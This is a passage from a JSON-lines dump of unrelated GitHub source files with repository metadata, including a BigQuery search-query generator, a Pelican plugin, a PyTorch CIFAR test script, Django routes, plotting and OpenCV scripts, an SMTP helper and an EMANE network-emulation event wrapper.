search. If present, overrides the list of search_columns (see below) for this category.\n search_terms: A list of search terms to look for in the column text.\n search_columns: The default columns to search for all categories. Overridden at a category level by search_columns_override.\n naked_columns: These columns will be included directly in the query -- so if you need columns such as an ID column to pull through, put them here.\n from: Supply either a from_clause (a COMPLETE SQL FROM clause) or a from_table (the name of a table). If you supply a from_clause,\n keep in mind you MUST prefix all of your column names with a table alias from your FROM clause to avoid name clashes.\n where: A complete WHERE clause. Can safely be omitted.\n\n A note on column names: The column name can either just be a string, or it can be an object:\n {\n 'col_name': 'col_name_1',\n 'col_alias': 'col_alias',\n }\n\n If it's an object, its alias will be used in the outputted column names rather than its full name.\n This can be useful if you have very long column names.\n \"\"\"\n program_data = {\n 'categories': [\n {\n 'category_name': 'messaging',\n 'search_terms': [\n 'chatbot',\n 'social',\n 'messaging'\n ],\n },\n {\n 'category_name': 'platform',\n 'search_terms': [\n 'integration',\n 'apps',\n 'third-party',\n 'third party',\n '3rd party',\n 'extensibility',\n 'objects',\n 'system',\n 'systems',\n ],\n },\n {\n 'category_name': 'reliability',\n 'search_terms': [\n 'outage',\n 'reliability',\n 'stability',\n 'uptime',\n 'downtime',\n 'security',\n 'breach',\n ],\n },\n {\n 'category_name': 'crmification',\n 'search_terms': [\n 'sfa',\n 'sales automation',\n ],\n },\n {\n 'category_name': 'enterprise',\n 'search_terms': [\n 'architecture',\n 'scalability',\n 'itsm',\n 'itil',\n 'sandbox',\n 'ola',\n 'sla',\n ],\n },\n {\n 'category_name': 'other',\n 'search_terms': [\n 'social listening',\n 'social media management',\n 'social media monitor',\n ],\n }\n ],\n 'search_columns': [\n {'col_name': 'account_health_risk_type__c', 'col_alias': 'ahrt'},\n {'col_name': 'description_of_risk__c', 'col_alias': 'dor'},\n {'col_name': 'x2014_renewal_status_notes__c', 'col_alias': 'rsn'},\n {'col_name': 'churn_reason__c', 'col_alias': 'cr'},\n {'col_name': 'competitive_notes__c', 'col_alias': 'cn'},\n ],\n 'naked_columns': [\n 'id',\n 'account_health_risk_type__c',\n 'description_of_risk__c',\n 'x2014_renewal_status_notes__c',\n 'churn_reason__c',\n 'competitive_notes__c',\n ],\n 'from': {\n 'from_table': 'sfdc.account_scd2'\n },\n 'where': \"WHERE dw_eff_end = '9999-12-31'\"\n }\n\n def get_search_columns(category):\n return category['search_columns_override'] if 'search_columns_override' in category else program_data['search_columns']\n\n def get_column_alias(column):\n return column if isinstance(column, str) else column['col_alias']\n \n def get_column_name(column):\n return column if isinstance(column, str) else column['col_name']\n\n def generate_category_variables(categories):\n variables = ''\n for category in categories:\n category_name = category['category_name']\n variables += f\"DECLARE {category_name} STRING;\\n\"\n return variables + '\\n'\n\n def generate_category_variable_values(categories):\n variable_values = ''\n for category in categories:\n category_name = category['category_name']\n search_terms = category['search_terms']\n variable_values += f\"SET {category_name} = r'\\\\b({'|'.join(search_terms)})\\\\b';\\n\"\n return variable_values + '\\n'\n\n def generate_columns_select_list(columns):\n return '\\n'.join([f' {col_name},' for col_name in columns])\n\n def generate_category_search_columns(categories):\n columns = ''\n for category in categories:\n category_name = category['category_name']\n search_columns = get_search_columns(category)\n columns += f\"\\n\\n -- Autogenerated columns for category: {category_name}\\n\"\n for col in search_columns:\n col_alias = get_column_alias(col)\n col_name = get_column_name(col)\n columns += f\" REGEXP_CONTAINS(COALESCE(LOWER({col_name}), ''), {category_name}) AS {col_alias}_contains_{category_name},\\n\"\n columns += ' NULLIF('\n columns += '\\n ARRAY_TO_STRING('\n columns += f\"\\n REGEXP_EXTRACT_ALL(COALESCE(LOWER({col_name}), ''), {category_name}),\"\n columns += \"\\n ', '\"\n columns += \"\\n ),\"\n columns += \"\\n ''\"\n columns += f'\\n ) AS {col_alias}_{category_name}_matches,\\n'\n return columns[:-2] + '\\n'\n\n def get_from_clause(data):\n if 'from_clause' in data['from']:\n return f\"\\n {data['from']['from_clause']}\\n\"\n else:\n return f\" FROM {data['from']['from_table']}\\n\"\n\n def generate_initial_flags_cte(data):\n cte = ''\n cte += 'WITH initial_flags AS\\n'\n cte += '(\\n'\n cte += ' SELECT\\n'\n cte += generate_columns_select_list(data['naked_columns'])\n cte += generate_category_search_columns(data['categories'])\n cte += get_from_clause(data)\n cte += f\" {data['where']}\\n\" if 'where' in data else ''\n cte += '),\\n\\n'\n return cte\n\n def generate_category_top_level_columns(categories):\n columns = '\\n'\n for category in categories:\n category_name = category['category_name']\n search_columns = get_search_columns(category)\n columns += f\"\\n -- Autogenerated top-level columns for category: {category_name}\\n\"\n columns += ' ' + \\\n '\\n OR '.join(\n [f\"{get_column_alias(col)}_contains_{category_name}\" for col in search_columns])\n columns += f'\\n AS any_contains_{category_name},\\n'\n columns += ' NULLIF(\\n'\n columns += ' CONCAT(\\n'\n for col in search_columns:\n col_alias = get_column_alias(col)\n col_name = get_column_name(col)\n columns += ' COALESCE(\\n'\n columns += f\" CONCAT('{col_name}: [', {col_alias}_{category_name}_matches, ']\\\\n'),\\n\"\n columns += \" ''\\n\"\n columns += ' ),\\n'\n columns = columns[:-2] + '\\n'\n columns += ' ),\\n'\n columns += \" ''\\n\"\n columns += f' ) AS all_{category_name}_matches,\\n'\n return columns\n\n def generate_initial_flags_column_list(categories):\n columns = ''\n for category in categories:\n category_name = category['category_name']\n search_columns = get_search_columns(category)\n for col in search_columns:\n col_alias = get_column_alias(col)\n columns += f' {col_alias}_contains_{category_name},\\n'\n columns += f' {col_alias}_{category_name}_matches,\\n'\n return columns[:-2] + '\\n'\n\n def generate_aggregate_flags_cte(data):\n cte = ''\n cte += 'aggregate_flags AS\\n'\n cte += '(\\n'\n cte += ' SELECT\\n'\n cte += generate_columns_select_list(data['naked_columns'])\n cte += generate_category_top_level_columns(data['categories'])\n cte += '\\n -- All flag columns from previous CTE\\n'\n cte += generate_initial_flags_column_list(data['categories'])\n cte += ' FROM initial_flags\\n'\n cte += ')\\n\\n'\n return cte\n\n def generate_final_select_statement(data):\n statement = ''\n statement += 'SELECT * FROM aggregate_flags\\n'\n statement += 'WHERE\\n '\n statement += '\\n OR '.join([f\"any_contains_{category['category_name']}\" for category in data['categories']])\n return statement\n\n def write_sql_to_file(sql):\n with open('output.sql', 'w') as file:\n file.write(sql)\n\n final_sql = ''\n final_sql += generate_category_variables(program_data['categories'])\n final_sql += generate_category_variable_values(program_data['categories'])\n final_sql += generate_initial_flags_cte(program_data)\n final_sql += generate_aggregate_flags_cte(program_data)\n final_sql += generate_final_select_statement(program_data)\n write_sql_to_file(final_sql)\n","repo_name":"tcc-sejohnson/bigquery-text-search-generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7149208104","text":"# -*- coding: UTF-8 -*-\n\"\"\"\nThis pelican plugin is inspired by the plugin [better figures and images](https://github.com/getpelican/pelican-plugins/tree/master/better_figures_and_images) and is intended to be used with the theme [niu-x2-sidebar](https://github.com/mawenbao/niu-x2-sidebar).\n\nTo all the img tags in the html document, this plugin do these things:\n\n * add attributes:\n * width: real width of the image file, in px.\n * if `NIUX2_LAZY_LOAD` is set as True in your pelican configuration:\n * add the following attributes:\n * data-height: real height of the image file, in px.\n * data-width: real width of the image file, in px.\n * add class `lazy`.\n * move attribute `src` to attribute `data-original`.\n\nRequirements:\npip install pillow beautifulsoup4\n\"\"\"\n\nfrom os import path, access, R_OK\nfrom pelican import signals\nfrom bs4 import BeautifulSoup\nfrom PIL import Image\nimport logging\nimport re\n\nlogger = logging.getLogger(__name__)\n_width_attr_reg = re.compile(r'[a-z]*$')\n\ndef parse_images(instance):\n if instance._content is None or not 'img' in instance._content:\n return\n\n content = instance._content[:]\n soup = BeautifulSoup(content, \"html.parser\")\n\n for img in soup('img'):\n # Build the source image filename\n my_url2path_func = instance.settings['MY_IMG_URL2PATH_FUNC']\n if not my_url2path_func:\n logger.error('Error: MY_IMG_URL2PATH_FUNC not defined in your pelican configuration.\\n\\\n niux2_lazyload_helper cannot determine the image path from its url.\\n')\n return\n imgPath = my_url2path_func(img['src'])\n if not imgPath:\n return\n if not (path.isfile(imgPath) and access(imgPath, R_OK)):\n logger.error('Error: image file not found: {}'.format(imgPath))\n continue\n\n # Open the source image and query dimensions\n im = Image.open(imgPath)\n imgWidth = im.size[0]\n imgHeight = im.size[1]\n imgResized = False\n\n if not img.get('width'):\n img['width'] = str(imgWidth) + 'px'\n else:\n imgResized = True\n\n # for lazyload.js\n if instance.settings.get('NIUX2_LAZY_LOAD', False):\n if img.get('class'):\n img['class'] += 'lazy'\n else:\n img['class'] = 'lazy'\n img['data-original'] = img['src']\n del img['src']\n if imgResized:\n newImgWidth = int(_width_attr_reg.sub('', img['width']).strip())\n newImgHeight = imgHeight * newImgWidth / imgWidth\n img['data-width'] = str(newImgWidth) + 'px'\n img['data-height'] = str(newImgHeight) + 'px'\n else:\n img['data-width'] = str(imgWidth) + 'px'\n img['data-height'] = str(imgHeight) + 'px'\n\n instance._content = soup.decode()\n\ndef register():\n signals.content_object_init.connect(parse_images)\n\n","repo_name":"sdphome/blog-content","sub_path":"plugins/niux2_lazyload_helper/niux2_lazyload_helper.py","file_name":"niux2_lazyload_helper.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25882946275","text":"import argparse\r\nfrom model import resnet18\r\nfrom torch import optim, nn\r\nimport torchvision\r\nfrom torch.backends import cudnn\r\nimport torchvision.transforms as transforms\r\nimport os\r\nimport sys\r\nfrom tqdm import tqdm\r\nfrom tensorboardX import SummaryWriter\r\nfrom utils import *\r\nfrom torch.autograd import Variable\r\n\r\ndef main(config):\r\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n net_path = config.net_path\r\n # writer = SummaryWriter(log_dir=config.result_path)\r\n transform_test = transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\r\n ])\r\n\r\n testset = torchvision.datasets.CIFAR100(root='./data', train=False, download=False, transform=transform_test)\r\n testloader = torch.utils.data.DataLoader(testset, batch_size=config.batch_size, shuffle=False, num_workers=2)\r\n\r\n net = resnet18()\r\n net.to(device)\r\n net.load_state_dict(torch.load(net_path))\r\n\r\n criterion = nn.CrossEntropyLoss()\r\n val_num = len(testset)\r\n test_steps = len(testloader)\r\n epochs = config.num_epochs\r\n best_acc = 0.0\r\n for epoch in range(epochs):\r\n net.eval()\r\n acc = 0.0\r\n running_loss = 0.0\r\n with torch.no_grad():\r\n val_bar = tqdm(testloader, file=sys.stdout)\r\n for images, labels in val_bar:\r\n images = images.to(device)\r\n labels = labels.to(device)\r\n output = net(images)\r\n loss = criterion(output, labels)\r\n\r\n predict = torch.max(output, dim=1)[1]\r\n acc += torch.eq(predict, labels).sum().item()\r\n running_loss += loss.item()\r\n\r\n val_bar.desc = \"valid epoch[{}/{}]\".format(epoch + 1, epochs)\r\n\r\n val_acc = acc / val_num\r\n mean_loss = running_loss / test_steps\r\n # writer.add_scalar('Test/accuracy', val_acc, epoch + 1)\r\n # writer.add_scalar('Test/loss', mean_loss, epoch + 1)\r\n print('[epoch %d] train_loss: %.3f val_accuracy: %.3f' %\r\n (epoch + 1, mean_loss, val_acc))\r\n\r\n if val_acc > best_acc:\r\n best_acc = val_acc\r\n\r\n print('best accuracy is: {}'.format(best_acc))\r\n\r\n\r\nif __name__ == '__main__':\r\n os.chdir(sys.path[0])\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--num_epochs', type=int, default=1)\r\n parser.add_argument('--batch_size', type=int, default=32)\r\n parser.add_argument('--lr', type=float, default=0.001)\r\n parser.add_argument('--result_path', type=str, default='./result')\r\n parser.add_argument('--aug', type=str, default='baseline')\r\n parser.add_argument('--net_path', type=str, default='')\r\n config = parser.parse_args()\r\n\r\n main(config)","repo_name":"MJzhao621/deep_learning_midterm","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17639401016","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ncreated by huash06 at 2015-07-15 09:02\n\n定义字符串的beauty为字符重复出现的次数的最大值。\n给定一个字符串,在不减少beauty的条件下找出其中最短的字串。\n\nSample test(s)\n input\n 5 #字符个数\n 1 1 2 2 1\n output\n 1 5\n\n input\n 5\n 1 2 2 3 1\n output\n 2 3\n\n input\n 6\n 1 2 2 1 1 2\n output\n 1 5\n\n分析:\n找出每个字符出现的位置的极左值和极右值[Li, Ri],保证有一个出现次数最多的字符i的范围[Li, Ri]取到就行\n\n\n\"\"\"\n__author__ = 'huash06'\n\nimport os\nimport sys\nimport functools\nimport collections\nimport itertools\n\nN = int(input())\nnums = [int(x) for x in input().split()]\n\ncount = collections.defaultdict(int)\nleft = {}\nright = {}\nfor i, num in enumerate(nums):\n count[num] += 1\n if num not in left:\n left[num] = i\n # caution!!!, forget this line in contest\n right[num] = i\n else:\n right[num] = i\n\nbeauty = max(count.values())\n\nres = len(nums)\nl = 1\nr = len(nums)\nfor v in filter(lambda x: count[x] == beauty, count.keys()):\n if right[v] - left[v] < res:\n res = right[v] - left[v] + 1\n l = left[v] + 1\n r = right[v] + 1\n\nprint(l, r)\n","repo_name":"shhuan/algorithms","sub_path":"py/codeforces/321_div2_B.py","file_name":"321_div2_B.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42836152110","text":"from django.urls import path, include\n\nfrom forum.views import *\n\n\nurlpatterns = [\n path('', SectionsListView.as_view(), name=\"forum\"),\n path('topics', TopicsListView.as_view(), name=\"all_topics\"),\n path('random', random_topic, name='random_topic'),\n path('section/', TopicsListView.as_view(), name=\"topics\"),\n path('topic/', TopicDetailView.as_view(), name=\"topic\"),\n path('update-post/', PostUpdateView.as_view(), name=\"update_post\"),\n path('delete-post/', PostDeleteView.as_view(), name=\"delete_post\"),\n path('rate-post/', PostScoreChangeView.as_view(), name=\"rate_post\"),\n path('create-post/topic-', PostCreateView.as_view(), name=\"create_post\"),\n path('create-topic/section-', TopicCreateView.as_view(), name=\"create_topic\"),\n path('change-topic/', TopicUpdateView.as_view(), name=\"change_topic\"),\n path('delete-topic/', TopicDeleteView.as_view(), name=\"delete_topic\"),\n path('captcha/', include('captcha.urls'), name='captcha')\n]\n","repo_name":"Gerhei/Plants_catalog","sub_path":"forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15133445527","text":"from projectq.backends import CircuitDrawer\nfrom projectq.meta import Dagger\n\nimport projectq.libs.math\nimport projectq.setups.decompositions\nfrom projectq.backends import Simulator, ResourceCounter\nfrom projectq.cengines import (AutoReplacer, DecompositionRuleSet,\n InstructionFilter, LocalOptimizer,\n MainEngine, TagRemover)\n\nfrom projectq.ops import (All, Measure, QFT)\nfrom homemade_code.gateUa import gateUa\nfrom homemade_code.initialisation import initialisation, meas2int, initialisation_n, mod_inv, egcd\nimport math\nfrom time import time\n\ndef run(a=4, N=7, x=2, param=\"count\"):\n \"\"\"\n |b> --> |b+(ax) mod N>\n nb of gate ~454*log2(N)\n :param a: a \"\n__all__ = ['HeatMatrix']\n\nimport math\nimport wx\nimport numpy as np\n\nfrom stars.visualization.utils import GradientColor\nfrom stars.visualization.PlotWidget import PlottingCanvas\n\nclass HeatMatrix(PlottingCanvas):\n def __init__(self,parent, layer, data,**kwargs):\n PlottingCanvas.__init__(self,parent,data)\n \n try:\n self.layer_name = layer.name\n self.title = \"Transition probility matrix (%s)\" % self.layer_name\n self.x_label = \"LISA transition states (1=HH,2=LH,3=LL,4=HL)\"\n self.y_label = \"LISA transition states\"\n self.data = data\n n = len(self.data)\n self.enable_axis_labels = False\n self.enable_axis = True\n self.enable_axis_x = False\n self.enable_axis_y = False\n \n # a NxN matrix\n self.x_min = 1\n self.x_max = n+1 \n self.y_min = 1\n self.y_max = n+1\n \n self.extent = (self.x_min, self.y_min, self.x_max,self.y_max)\n self.selected_polygon_ids = []\n self.status_bar = self.parentFrame.status_bar\n \n self.gradient_color = GradientColor(gradient_type='rdyibu')\n self.margin_right = 100\n \n # color schema: from blue to red\n self.color_matrix = []\n for i in range(n):\n color_row = []\n for j in range(n):\n p = self.data[i][j]\n color_row.append( self.gradient_color.get_color_at(p))\n self.color_matrix.append(color_row)\n \n except Exception as err:\n self.ShowMsgBox('Fail to init heat map! ' + str(err.message))\n self.isValidPlot = False\n self.parentFrame.Close(True)\n return None\n \n def OnClose(self,event):\n event.Skip()\n \n def plot_data(self,dc):\n # draw a NxN matrix\n w,h = 1,1\n for i,row in enumerate(self.data):\n for j,item in enumerate(row):\n start_x = j + self.x_min\n start_y = self.y_max - i\n \n pixel_x,pixel_y = self.point_to_screen(start_x,start_y)\n pixel_w,pixel_h = math.ceil(self.length_to_screen(w)),math.ceil(self.length_to_screen(h,axis=1))\n \n brush = wx.Brush(self.color_matrix[i][j])\n dc.SetBrush(brush)\n dc.DrawRectangle(pixel_x,pixel_y,pixel_w,pixel_h)\n \n if i==len(self.data)-1:\n dc.DrawText(str(j+1), pixel_x + pixel_w/2, pixel_y+pixel_h+5)\n if j==0:\n dc.DrawText(str(len(self.data)-i), pixel_x - 10, pixel_y + pixel_h/2)\n \n text_pixel_x, text_pixel_y = pixel_x + pixel_w/2.0 - 10, pixel_y + pixel_h / 2.0\n dc.SetPen(wx.WHITE_PEN)\n dc.SetBrush(wx.WHITE_BRUSH)\n dc.DrawText('%.4f'%(self.data[i][j]), text_pixel_x,text_pixel_y) \n \n # draw a legend bar\n pixel_x,pixel_y = self.point_to_screen( start_x+w, self.y_max)\n pixel_x += 20\n pixel_h = self.length_to_screen(self.y_max-self.y_min,axis=1)\n pixel_w = 20\n \n gradient_colorbar = self.gradient_color.get_bmp(pixel_w, pixel_h)\n dc.DrawBitmap( gradient_colorbar, pixel_x, pixel_y)\n \n pixel_x = pixel_x + pixel_w + 10\n dc.SetPen(wx.BLACK_PEN)\n dc.DrawText(str('%.2f'% np.max(self.data)), pixel_x,pixel_y)\n pixel_y = pixel_y + pixel_h - 12 \n dc.DrawText(str('%.2f'% np.min(self.data)), pixel_x,pixel_y)\n","repo_name":"GeoDaCenter/CAST","sub_path":"stars/visualization/plots/HeatMatrix.py","file_name":"HeatMatrix.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"21"} +{"seq_id":"6677435907","text":"# 析构方法\n# class Person:\n# def __del__(self):\n# print(\"销毁对象{0}\".format(self))\n# p1 = Person()\n# p2 = Person()\n\n# del p2\n# print(\"cheng'y'xu\")\n\n\n# class Person:\n# def say_hai(self):\n# print(\"hello\")\n\n# def say_hai(self, name):\n# print(\"hello:\", name)\n\n# class Person:\n# def work(self):\n# print(\"努力上班 !\")\n\n# def play_ganme(s):\n# print(\"{0}在玩游戏\".format(s))\n\n# Person.play = play_ganme\n# p = Person()\n# p.work()\n# p.play()\n\n#测试私有属性\n\n# class Employee:\n# def __init__(self,name,age):\n# self.name = name\n# self.__age = age\n# def __work(self):\n# print(\"好好工作,赚钱娶媳妇!\")\n# print(\"年龄:{0}\".format(self.__age))\n\n# e = Employee(\"搞起\", 18)\n# print(e.name)\n\n# print(e._Employee__age)\n# print(dir(e))\n# e._Employee__work()\n\n#测试@property的用法\n\n# class Employee:\n# @property\n# def salary(self):\n# print(\"salary run...\")\n# return 10000\n\n# empl = Employee()\n# print(empl.salary)\n\n#用法\n\nclass wsz:\n def __init__(self,name ,salary):\n self.__name = name\n self.__salary = salary\n\n @property\n def salary(self):\n return self.__salary\n\n @salary.setter\n def salary(self):\n if 1000' \n msg['To'] = data['recipient_name'] + ' <' + data['recipient_email'] + '>'\n #msg['To'] = \"Felix Werner \"\n plain_msg = data['plain_body']\n html_msg = data['body']\n\n\n msg.attach(MIMEText(plain_msg, 'plain'))\n msg.attach(MIMEText(html_msg, 'html'))\n\n mailserver = self.__establish_connection()\n\n mailserver.sendmail(self.user_email, data['recipient_email'], msg.as_string())\n print(\"Sleep 5 seconds.\")\n time.sleep(5)\n \n mailserver.quit()\n\n def __establish_connection(self):\n mailserver = smtplib.SMTP(self.smtp_server ,self.smtp_port)\n mailserver.set_debuglevel(1)\n # identify ourselves to smtp gmail client\n mailserver.ehlo()\n # secure our email with tls encryption\n mailserver.starttls()\n # re-identify ourselves as an encrypted connection\n mailserver.ehlo()\n mailserver.login(self.user_email, self.user_pw)\n\n return mailserver","repo_name":"dnberlin/holy_crm","sub_path":"holy_crm/email_handler.py","file_name":"email_handler.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30822130774","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.fftpack import fft\n\nFs = 1200 # Sample frequence\nN = 300 # Number of sample points\nT = 1.0 / Fs\nt = np.linspace(T, N * T, N)\n\n# I Component\nf1 = 130\nx1 = np.sin(f1 * 2.0 * np.pi * t)\n\n# II Component\nf2 = 288\nx2 = np.sin(f2 * 2.0 * np.pi * t)\n\n# Complete Component\nx = x1 + x2\n\n# Display\nplt.figure(1)\nplt.plot(t, x2)\nplt.grid()\nplt.xlabel('Time(s)')\nplt.ylabel('Amplitude')\ntitle = \"\\sin(2 \\omega {} t) + \\sin(2 \\omega {} t)\".format(f1, f2)\nplt.title(\"$x(t) = {}$\".format(title))\nplt.show()\n","repo_name":"SKantar/SignalProcessing","sub_path":"01_task/00_subtask.py","file_name":"00_subtask.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2360800883","text":"#!/usr/bin/env python3\n\n\"\"\"\nIMPORTS\n\"\"\"\n#import the necessary package\nimport imutils\nimport cv2\nimport time\n\n\"\"\"\nFUNCTION DEFINITION\n\"\"\"\n\ndef pre_process(img):\n #convert to gray\n gray = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)\n #blur it\n blur = cv2.GaussianBlur(gray,(5,5),0)\n #threshold it\n _,thresh = cv2.threshold(blur,60,255,cv2.THRESH_BINARY)\n return thresh\n\ndef contours(thresh_img):\n cnts = cv2.findContours(thresh_img.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n return cnts\n\ndef contour_plot(img):\n\n thresh_img = pre_process(img) #getting the thresholded image\n cnts = contours(thresh_img) #getting the contours\n\n #loop over the contours\n for c in cnts:\n #compute the center of contours\n # print(\"start of the loop\")\n M =cv2.moments(c)\n cX = int(M[\"m10\"]/M[\"m00\"])\n cY = int(M[\"m01\"]/M[\"m00\"])\n #\n #draw the contour and center of the shape on the image\n cv2.drawContours(img,[c],-1,(0,255,0),2)\n cv2.circle(img,(cX,cY),7,(255,255,255),-1)\n cv2.putText(img,\"center\",(cX-20,cY-20),cv2.FONT_HERSHEY_SIMPLEX,0.5,(255,255,255),2)\n cv2.imshow('output',img)\n # cv2.waitKey(0)\n\n # cv2.imshow('output',thresh_img)\n cv2.waitKey(0)\n print(\"reached the end of the program\")\n cv2.destroyAllWindows()\n\n\"\"\"\nMAIN CODE\n\"\"\"\nimg = cv2.imread('xxxxx') #path to file\ncontour_plot(img)\n","repo_name":"karry3775/OPEN_CV","sub_path":"Contour_plot.py","file_name":"Contour_plot.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10458580601","text":"from __future__ import absolute_import, division, print_function\nfrom collections import defaultdict\nimport math\nimport itertools\nimport re\nimport sys\n\nimport etce.timeutils\nfrom etce.utils import nodestr_to_nodelist,daemonize\nfrom etce.eelsequencer import EELSequencer\nfrom etce.wrapper import Wrapper\n\ntry:\n from emane.events import EventService, LocationEvent, PathlossEvent, AntennaProfileEvent\nexcept:\n from emanesh.events import EventService, LocationEvent, PathlossEvent, AntennaProfileEvent\n\n\n\nclass POV(object):\n def __init__(self):\n self._position = None\n self._orientation = None\n self._velocity = None\n self._dirty = False\n\n @property\n def position(self):\n return self._position\n\n @property\n def position(self, lat, lon, alt):\n self._position = (lat, lon, alt)\n self._dirty = True\n\n @property\n def orientation(self):\n return self._orientation\n\n @property\n def orientation(self, pitch, roll, yaw):\n self._orientation = (pitch, roll, yaw)\n self._dirty = True\n\n @property\n def velocity(self):\n return self._velocity\n\n @property\n def velocity(self, azimuth, elevation, speed):\n self._velocity = (azimuth, elevation, speed)\n self._dirty = True\n\n @property\n def dirty(self):\n return self._dirty\n\n def read_reset(self):\n self._dirty = False\n return (self._location, self._orientation, self._velocity)\n\n\n\nclass EmanePhyInit(Wrapper):\n \"\"\"\n Send EMANE PHY Layer Events to set initial network conditions.\n\n This wrapper takes an EEL file as input. It currently recognizes these sentences:\n\n 1. EMANE pathloss sentences of format:\n\n TIME nem:ID pathloss [nem:ID,PATHLOSS]+\n\n example:\n Set bidirectional pathloss between nem 1 and nems 2-7 to 90 and\n nem 1 and nem 8 to 200:\n\n -Inf nem:1 pathloss nem:2,90 nem:3,90 nem:4,90 nem:5,90 nem:6,90 nem:7,90 nem:8,200\n\n\n 2. EMANE location event sentences with latitute, longitude and altitude only:\n\n TIME nem:ID location gps LATITUDE,LONGITUDE,ALTITUDE\n\n LATITUDE and LONGITUDE units are degrees. ALTITUDE unit is meters.\n\n example:\n Set nem 3 location to 40.025495,-74.315441,3.0:\n\n -Inf nem:3 location gps 40.025495,-74.315441,3.0\n\n\n 3. EMANE orientation event sentences with pitch, roll and yaw.\n Note orientation sentences must be specified with (and after)\n an associated location sentence.\n\n TIME nem:ID orientation PITCH,ROLL,YAW\n\n PITCH,ROLL,YAW units are degrees.\n\n example:\n Set nem 3 pitch roll and yaw to 3.0,4.0,5.0\n\n -Inf nem:3 orientation 3.0,4.0,5.0\n\n\n 4. EMANE velocity event sentences with azimuth, elevation and magnitude.\n Note velocity sentences must be specified with (and after)\n an associated location sentence.\n\n TIME nem:ID velocity AZIMUTH,ELEVATION,MAGNITUDE\n\n AZIMUTH and ELEVATION units are degrees. Magnitude units is meters/second.\n\n example:\n -Inf nem:3 velocity 30.0,20.0,200.0\n\n\n 5. EMANE fadingselection event (emane >= 1.2.1) of format:\n\n TIME nem:ID fadingselection nem:ID,none|nakagami [nem:ID,none|nakagami]*\n\n example:\n Send fading selection event to nem 4 selecting none for nem 1 and\n nakagami for nems 2 and 3:\n\n -Inf nem:4 fadingselection nem:1,none nem:2,nakagami nem:3,nakagami\n\n\n 6. An allinformedpathloss sentence of format:\n\n TIME nem:ID[(,|-)ID]* allinformedpathloss PATHLOSS\n\n PATHLOSS units is dB.\n\n example:\n Set forward and reverse pathloss between all pairs of nems 1,2 3 and 7 to 90:\n\n -Inf nem:1-3,7 allinformedpathloss 90\n\n 5. EMANE antennaprofile event of format:\n\n TIME nem:ID antennaprofile PROFILEID,AZIMUTH,ELEVATION\n\n AZIMUTH and ELEVATION units are degrees.\n\n example:\n Set nem 4 antenna profile to 3 with azimuth 195 and elevation 45:\n\n 4.0 nem:4 antennaprofile 3,195,45\n\n\n As shown in all of the examples, the wrapper accepts negative time values and,\n especially, a time value of -Inf (negative infinity) which means send the event\n immediately. All finite event times are offset from the test start time.\n\n \"\"\"\n\n def register(self, registrar):\n registrar.register_infile_name('emanephyinit.eel')\n\n registrar.register_outfile_name('emanephyinit.log')\n\n registrar.register_argument('eventservicegroup',\n '224.1.2.8:45703',\n 'The Event Service multicast group and port.')\n\n registrar.register_argument('eventservicedevice',\n None,\n 'Event channel multcast device.')\n\n\n def run(self, ctx):\n if not ctx.args.infile:\n return\n\n # position, orientation and velocities are specified as separate\n # EEL sentences - however orientation and velocity events must\n # be specified with their associated location triplets.\n # Store the most recently specified location for each nem and\n # reuse it as optional orientation and velocity sentences are\n # parsed.\n self._location_cache = {}\n\n handlers = {\n 'allinformedpathloss':self.allinformed_pathloss,\n 'location':self.location_gps,\n 'orientation':self.orientation,\n 'velocity':self.velocity,\n 'pathloss':self.pathloss,\n 'fadingselection':self.fadingselection,\n 'antennaprofile':self.antennaprofile\n }\n\n if not ctx.args.eventservicedevice:\n message = 'Wrapper emane.emanephyinit mandatory argument \"eventservicedevice\" ' \\\n 'not specified. Quitting.'\n raise RuntimeError(message)\n\n mcgroup,port = ctx.args.eventservicegroup.split(':')\n\n sequencer = EELSequencer(ctx.args.infile,\n ctx.args.starttime,\n list(handlers.keys()))\n\n service = EventService((mcgroup, int(port), ctx.args.eventservicedevice))\n\n with open(ctx.args.outfile, 'w+') as lfd:\n print('process infile \"%s\"' % ctx.args.infile)\n\n for eventtime,moduleid,eventtype,eventargs in sequencer.init_events:\n events = handlers[eventtype](moduleid, eventtype, eventargs)\n\n for nem,event in list(events.items()):\n service.publish(nem, event)\n\n logline = 'process eventtype \"%s\" to nems {%s}' % \\\n (eventtype, ','.join(map(str, sorted(events.keys()))))\n\n self.log(lfd, logline)\n\n # return if there are no non-initialization events\n if not sequencer.has_dynamic_events:\n return\n\n # otherwise daemonze and carry on\n print('daemonize for dynamic events')\n if daemonize() > 0:\n return\n\n # reopen after daemonize\n service2 = EventService((mcgroup, int(port), ctx.args.eventservicedevice))\n\n # and log\n with open(ctx.args.outfile, 'a') as lfd:\n try:\n for eventlist in sequencer:\n for eventtime, moduleid, eventtype, eventargs in eventlist:\n if math.isinf(eventtime):\n 